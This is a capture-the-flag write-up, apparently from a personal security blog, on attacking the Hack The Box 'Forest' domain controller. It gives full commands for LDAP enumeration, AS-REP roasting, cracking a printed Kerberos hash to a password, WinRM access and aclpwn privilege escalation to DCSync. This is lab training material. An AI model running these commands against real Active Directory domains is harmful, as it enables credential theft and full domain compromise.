> For the complete documentation index, see [llms.txt](https://calvin-lai.gitbook.io/calvin-lai-security/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://calvin-lai.gitbook.io/calvin-lai-security/hack-the-box-writeup/windows-machine/forest.md).

# Forest 10.10.10.161

Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win. \<John Lambert>

![Owned at 03 Jan 2020](https://lh6.googleusercontent.com/TPn8N-a7CqHzf1V5yaEpImcpe6PXe0E3MCWEBBDaAeORTvlb0xfw-ckrtoPc88Ky2ZJypIATdlwlAbF_LfCDjRWd89694O2RojvzybZQxEk4U4ZmuTgL-lB40z4sLMTS-A)

## Background <a href="#h.vfbijv8sx3k5" id="h.vfbijv8sx3k5"></a>

[Forest](https://www.hackthebox.eu/home/machines/profile/212)[ ](https://www.hackthebox.eu/home/machines/profile/225)is an "Easy" difficulty Windows machine. It is a Windows Domain Controller (DC) and installed an Exchange serve&#x72;**,**  it requires the DC enumeration technique and Kerberos knowledge.

Anonymous LDAP can be used to access the DC server and enumerate domain objects. A service account was found in which the Kerberos pre-authentication disabled, it can be cracked to gain the initial access. This service was a member of the "Account Operators" group, which can be used to create a privileged Exchange account.

Finally, this privileged account was leveraged to gain DCSync privileges on the domain and dump the NTLM hashes.&#x20;

## Penetrating Methodology: <a href="#h.ssha3n31zsuk" id="h.ssha3n31zsuk"></a>

### Service Scanning <a href="#h.u7ibpjhfhn9d" id="h.u7ibpjhfhn9d"></a>

* Nmap

### Enumeration <a href="#h.uts34k2jsw2l" id="h.uts34k2jsw2l"></a>

* Kerberos
* SMB: smbclient, smbmap, enum4linux
* Ldap: ldapsearch
* NTLM:  impacket/GetNPUsers

### Exploitation <a href="#h.1rkqcutb40dg" id="h.1rkqcutb40dg"></a>

* Password Crack: John
* SMB connection: impacket/smbexec

### Getting Less Privilege Shell <a href="#h.k5b7uqhuvxu" id="h.k5b7uqhuvxu"></a>

* Evil-winrm.rb
* Check vulnerability: sherlock.ps1
* secretsdump

## Walkthrough: <a href="#h.g6dz8pxgdqfw" id="h.g6dz8pxgdqfw"></a>

Target machine: 10.10.10.161

Attacking (Hacker) machine: 10.10.14.18

## Hacking Process Part 0 – Service Scanning <a href="#h.i6etv5uyprbw" id="h.i6etv5uyprbw"></a>

The target machine IP is 10.10.10.161. Get a basic understanding the available services of the target machine using nmap aggressive scanning to all available ports.

0.1) Quick Pre-searching

nmap  10.10.10.161, quick scan to get the opened port list

![](https://lh6.googleusercontent.com/-aTUrH_xXoS4QnuHBY6AMQbLkm3cl2HWyQFgCvTRcIcaF-U_whA3HwWXLqUulp8RUEJRNfS7CX20FFQtdbRqcUydvIY6Y3pLh7jV7VV6VPSj13felNaTung3Lgt5cfluwA)

0.2) Details Analysis

nmap -p 22,80,443 -A -o nmap-forest.txt 10.10.10.161![](https://lh3.googleusercontent.com/ELBBHat1UzmRc_JjyNOjVU4K9wz77yOLXitmGpUTxG1QhSejVBsJFYttKV1b3cCjVROqOgyTPggmr6BXoc3d9rQXXb663RAILYSYivgRBxK19ZRLEpHI-SczsSESFpFkWA)

Enumeration strategies

1. LDAP - Port 389
2. SMB - Port 135
3. Kerberos - Port 88

## Hacking Process Part 1 – Enumeration <a href="#h.sp8qz85gyrtb" id="h.sp8qz85gyrtb"></a>

enum4linux 10.10.10.161, get the basic information of the target machine

![](https://lh4.googleusercontent.com/Bw_Ax1Rdzfa83NjAj5TnYBVxkaESBThQP0cNFzBilYzpQEngncrejboUdWgTjbjak84p1Zc46iZ1U_Dcjj9Hgv-1jdNUgxZBiFQk_9DJiyxExy4rB5cgGX2ndGY33wWewA)

### 1.1) Strategy 1 Check port 389 LDAP Enumeration <a href="#h.tf5nk9b4zkdw" id="h.tf5nk9b4zkdw"></a>

* nmap -p 389 --script ldap-rootdse 10.10.10.161

![](https://lh3.googleusercontent.com/-_yeokyDldGmovIsV8C87V5LBQ1quBzE-F9q3OTyNxlxMY_bN_u0lhBjO4iqRtKF5bBAopysX3khsScNoThZEX9ePwxSrKi_CcOPqPfc7SD9JplnZDfO3AZgXxHkrTIO9A)

* **ldapsearch -x -h 10.10.10.161 -b "DC=htb,DC=local"**

Keep this information for later use

Domain: HTB with the following user

* HTB\sebastien
* HTB\lucinda
* HTB\svc-alfresco
* HTB\andy
* HTB\mark
* HTB\santi

### 1.2) Strategy 2 - Check SMB <a href="#h.g7vxy198w27q" id="h.g7vxy198w27q"></a>

Anonymous SMB login does not allow, SMB service does not available if no user credential &#x20;

smbclient -I 10.10.10.161 -L andy

![](https://lh3.googleusercontent.com/IX0QN0ZFqvgzILupfX5ysbOJD3vFmW5vSfxoocK7tba_Y72y9W4FDnvPIHBfnv_kxMa3W6sK3OiUlkaBSM6ZE8f5WZnWh3dOfYwRMvu__gKviu35aF2zkDyXv1coiVBQSA)

smbmap -R Replication -H 10.10.10.161

![](https://lh4.googleusercontent.com/v4dsssMkBfUK2VmQtsRljKLQ4n9R8dTjCLBRzJAWO9WHkcq4xMEAYicT7WAIQab8zhpWceWsEPfMqLCXSBpMpgcp-OdwOIgjYh2NwRgGb9uKsh67ZLuu8Za80M9OwFhxvg)

### 1.4) Strategy 3 Kerberos <a href="#h.xbdljxjle4ks" id="h.xbdljxjle4ks"></a>

Using the kerbrute to evaluate those user accounts found at above

../../../tools/win/kerbrute/kerbrute.py -domain htb.local -users ./user.list -passwords /usr/share/wordlists/rockyou.txt -outputfile forest\_passwords.txt

![](https://lh3.googleusercontent.com/RzTDYJYxfWBpe6_SH8hYWMk_Uh-vbn-xOAjZUsSS44It3Hjnhq9-bqABx2hdUXHwqMxIEnWQvgmd5hGfbadqHaAcqNWvcIhRS0K_wEJdCv9cfClM-jajBnHIsS1RCY5OUQ)

It finds that the svc-alfresco account is “not preauth” account. Try to get the TGT using getNPUsers

### ![](https://lh6.googleusercontent.com/RvYQjF_W648-r-yL3tz_26r8kCFrGQThbNGnDBJsBANpLmeBgavY3ooWZQuxSleVo0L848TX9KibEhuSOabISIfB0uuOUrQoUcpgKOfCoBaxigKllBZHHR9b54fNXDzMxQ) <a href="#h.gcfk2ny807ex" id="h.gcfk2ny807ex"></a>

Add the 10.10.10.161 to hosts file for the htb.local and try again

![](https://lh5.googleusercontent.com/8S74sEzMTVWXfGJim_TgqLyA76K2CpA1iA191e6lJP_nFd6GxmVO4VPmWG6hrHqTPnlMH5jVTscCusyfx9EX4N3brdQ52G_pOOPWHlOTEQv6eQEXw7K8KuQoczjNpdvrtw)

Cracking AS-REP Hashes with HashCat/John

$krb5asrep$23$<svc-alfresco@HTB.LOCAL>:3ce79e32b438b810950ea097f50ccedf$63b3f13f672cc9d483230b4c28ea26ff574bd9906b92cd5193d8496b2059ba20d009e50f7f3eed3d5440709e3b45b949ae456f27dd61b58c4e81a70e60c41adf75af3615acdd655455daa8023a9e931e91078e72db14241e8670375052ea5e13d817f328ffc19ca80873b736892fc1b65127d2f3f852eb11cb5749b46bad8fe49349352f9b5995f26f5cd24ea13d446710004a7cd86177206b638cff8f791a8df3a3c3a059c9087a99f18c9f5b21445a306d3695aed15377b3380b4c8b3e431bcf59afedabedf890d4457c38f193d750052f952e0ea746a16e6014615b4afe1fd4a4335fa14d

john --wordlist=/usr/share/wordlists/rockyou.txt alfresco.tgt

![](https://lh4.googleusercontent.com/WL8aBdZ2bcyCFdNkN0rJiN2SJxjjT_tB542Cx3eCUKxBgARZurXiiCuSc1sYmY6_SwLxKPwY_rFaI_uw2-6X-eBocfVtpsRLQUftCRAmqBhs55RP71phhBGqLprsitPyGQ)

python ../../../tools/win/impacket-0.9.20/examples/getTGT.py htb.local/svc-alfresco:s3rvice

![](https://lh3.googleusercontent.com/xrHHVkMTC-3FJVYWoeDaGjVnBh3HaSly5p9PG3wGy9Aj2J7OR21fBdpyyfvO1dPZu8c77WfcVMUFo64MjdN347jWKYqIamsqSptIwIInrMe5_0erRiCU-m8c3zx6jvufOg)

Get the password of svc-alfresco

## Hacking Process Part 2 – Exploitation <a href="#h.rybuorwmspqk" id="h.rybuorwmspqk"></a>

### 2.1) Exploitation <a href="#h.7hayfoa01v3o" id="h.7hayfoa01v3o"></a>

The password of svc\_alfresco is confirmed, but it cannot be accessed by SMB

../../../tools/win/impacket-0.9.20/examples/smbexec.py htb.local/svc-alfresco:s3rvice\@10.10.10.161  net user

![](https://lh6.googleusercontent.com/iR9JFdJq2zR6GxAmocPy86TRH-aRGBUEZ2zah-Ry8bGmV6hg80gO4bFZg029pkVuZNsJ9AViX44br90SyxwOwLng8Lb460V4pfVszxZzHSv8SX94JljzcV0K215fqbw3EA)

## Hacking Process Part 3 – Getting Low Privilege Access <a href="#h.2tnfkp5exzdk" id="h.2tnfkp5exzdk"></a>

3.1) WinRM

Test the WinRM (Windows Remote Management) service using the account

evil-winrm.rb

![](https://lh5.googleusercontent.com/rbU0SxDrEjGgvowBZjq1Jw_p0yj_Q-Iwg6g3qtGlvmYoKEXp4a60MwKu-OFl__lfkC-xsSgPdEnLAqc_hb-hwd_tE6M_QtMONXXDNVt04YFFY49Lx4aHroKfsGu9da2Wfw)

Get the low privilege access, check the flag

### ![](https://lh6.googleusercontent.com/GtWqXTdPq_YLAX7iZqc81GtWr7oO1GkWM4PfdjKCoupFUKAdZOHxdeU2GqfFkWHbzOE_AoYyjmf5P7Ll8EhDaTKBIVh7CQjdk-m93jrqZ5R-UYp0dPOnqcS9eaENR4otsA) <a href="#h.aa8qqjbuvuxz" id="h.aa8qqjbuvuxz"></a>

Check the svc-alfresco is not the local administrators group

![](https://lh5.googleusercontent.com/nKwBbIJSSxo0N48Hl1ikPGji6FSo6GCD-7z5DrokADCSY9P0Xzjq3oB5dQ84wCBR9GGepoTHK7Ub6nijFOSIQ7x1zFqoUoanT3Ts6TOhB-tt4eMIKOxSnWcg-Mj82O85sA)

3.1) Enumeration

No Vulnerability found

sherlock.ps1

![](https://lh3.googleusercontent.com/CBcpb3ilr5FH9RwwJ2AOEX4RlJ0uRIBTA2DsHTieuCggzr28bLGqovtpH1_3p-c1vaoukzalGu62J5sGe-Qx8TIyiu2G-EL9i0ISjOERfLXQKTHom8V0SDgRJRLcQABnMA)![](https://lh5.googleusercontent.com/GNOUkKYBD-Z5tLS0wCDsxXJ4NBuy5O3_bbAQZxtGiTmKwBfsbD7dKypW8qtq_WvAlsEY35_DkbIhOWq2B9hS2t6eyW0tfz9sOdhwG6wPi_RPg1Uu00qhhJjjN0PPD_tctw)

Cannot get the ntlm hash using the account using secretsdump

![](https://lh4.googleusercontent.com/JDd_1YYq-XNZdVf-qlQEfgwGW7eshKjKrGZg74dNbBw3eqGgNG3PCy3148nOuuan8ScWhwPl6BG0RNfKdnrEYH70mWbyH_rabtX98Vomf84SyaFVH4HxqQyLliJnlUaa3Q)

![](https://lh3.googleusercontent.com/aN4SAydn35kZDt9RaSbddN2m_HWA75c91xvYfauZoKM29WgWHEGgBzH_qIUTVy0FAImf54VZV2xLZdXLFqdujuGnm8s5s5ivA23-EFvE-uZ1LRQ7W6wEAAT3FPxYAKSK4A)

4.1) Sherlock to find the vulnerability of the system

![](https://lh3.googleusercontent.com/JrbRLSZ8Etr-poPCTKYWuXckfQuILvefPBW5NrmY8TQ1ZoRfPaAUPKFWx8nz9tZOIW5yQuSNGrkuQmKs2OjL_HW80z84XhNzTeWwkXJl1XeGxMnOlO6X8XGRGvggV4-bFg)

![](https://lh3.googleusercontent.com/yIXfs3hiL6OYb1UjdVtAp3KELPac7UeqozVVkaKskYhZjLwlZWIb2LyiOn-eAgx79veK7xq78v7i-OQDM3w7qLQjw0ovWn5ENxBiyKKVYCBll15tgcuPix59m5XZ8cmOxQ)

Objective: from SVC-aldresco to HTB.local

![](https://lh4.googleusercontent.com/PAryt7dSF4ys9ngy9GF1dEMUugr1eT0WYTwIXStWv9X6Zqk4xrFbqce12hYtEgnuJmvBcJxhc7qJY5ttwrUAMncB4ZsSeP91rlGnFCIxfgvSSzUlD1-QMC_DaK7JF7Zi2Q)

![](https://lh5.googleusercontent.com/LRphPML4yR98DL8JLUKVhHfxwLJY-HcszSzKXEfI6BZAPA7JhKD8jyyCF3v8RFj8gHxQFPD-obm0Gp8r2Nr5-p-hcdJar1CsPKaKU2m6nNHZzCHE-wDPaLCISXBCmTNXWA)

aclpwn -f svc-alfresco -ft user -d htb.local -t htb.local -dry -s 10.10.10.161 -u svc-alfresco -p s3rvice

![](https://lh3.googleusercontent.com/9Gtv_B7YRPZ-Eh06MB3qO76tPIjACENVtSt6KmAJleTCNi2_VdMjLrIEFYDTeQ9L5u33pbteXmM6HDj0eIemq-ocUL7pIVJinO9dbUjbgKFF8kQC17zfp11ZBJzGA_OwVA)

aclpwn -f svc-alfresco -ft user -d htb.local -t htb.local -s 10.10.10.161 -u svc-alfresco -p s3rvice

![](https://lh4.googleusercontent.com/qzdz-6f-C0MQyyxr9coxlSQgk8AKzHkzSUgttAYyGjbS-0xTg1b0MzdFu3-xJu3kmvkAxwgZOc8NaqRgdE6jNGmEpyWylVnWxAXSbd1R88B8bPZaWWSlXpQG9_yCQD7juw)

![](https://lh6.googleusercontent.com/LCtUxiJkNXaRsgiYlUW1VT2VqbosoESsj1ebdso1Q2T1E1W6VOkJiDPKdtPoas5J6QFdIvHcpjmoWI8gpVs-FwkgsVYA_JiMvXYh_lJ6qTWk7a_LU1QwlFSZqqSOEpE2dQ)

![](https://lh4.googleusercontent.com/KBnarAcvOtRBmgii3YfGlbGT5RDP6qUDHRyJ_Fgv7ZgFqofqxJ43hyb3JaWJn5i3VlGxGjNBaOTb201TDXjceVobo1UoA9dzoyw6KFI4cqvPiMxyZmbs-F2iMnCnS2bqgg)

![](https://lh6.googleusercontent.com/cDNCz4iMhMeOnRYU6idvQ3gStxFbrZ8EltnBjfZyvUfwoyZY3wqq0s-pNOPGAiKRqaT84xX__UpRwV1_KkJEh06Ho0bmq7hs4yb9KU56iLXFR966oBEkAaLknlXocdRXUQ)

![](https://lh4.googleusercontent.com/Zb19wi7h9dj8vQ4hW0E61e7mDZh5eKjFGlQR0qI4cP0IjYyXap8xAf56NbIMgDvbL3dQOZKi9ZnNC8hDXAczlUcGQY9Jkt8VXd0olYVzaK_dSqDENT492vJTANy0U0oY_w)

![](https://lh3.googleusercontent.com/H0JoUcr_zzs_784KtchZ6zZk5Te4-BbyrbbHTH3083xK1LAU3alVYAfaDs8lhb2QTris7FwtzH-jknAliDLEO5s6qLjIZUE-UNwh0qxGyxw3HXzDYJVRLvEHBkyiIVXVhQ)

## Conclusion... <a href="#h.mgnbzniv90re" id="h.mgnbzniv90re"></a>

## Reference Link <a href="#h.2v27l0459ybg" id="h.2v27l0459ybg"></a>

What is kerberos and how to attack it.

[https://www.tarlogic.com/en/blog/how-to-attack-kerberos/](https://www.google.com/url?q=https://www.tarlogic.com/en/blog/how-to-attack-kerberos/\&sa=D\&ust=1608708295722000\&usg=AOvVaw0iHA3qrhup_mT1UPumOkFg)

[https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/](https://www.google.com/url?q=https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/\&sa=D\&ust=1608708295723000\&usg=AOvVaw0yiOtI0SlE9xRH-a0iFMe0)

[https://securityonline.info/aclpwn/](https://www.google.com/url?q=https://securityonline.info/aclpwn/\&sa=D\&ust=1608708295723000\&usg=AOvVaw3C9YrgXz33XgyTW7YAUeFA)
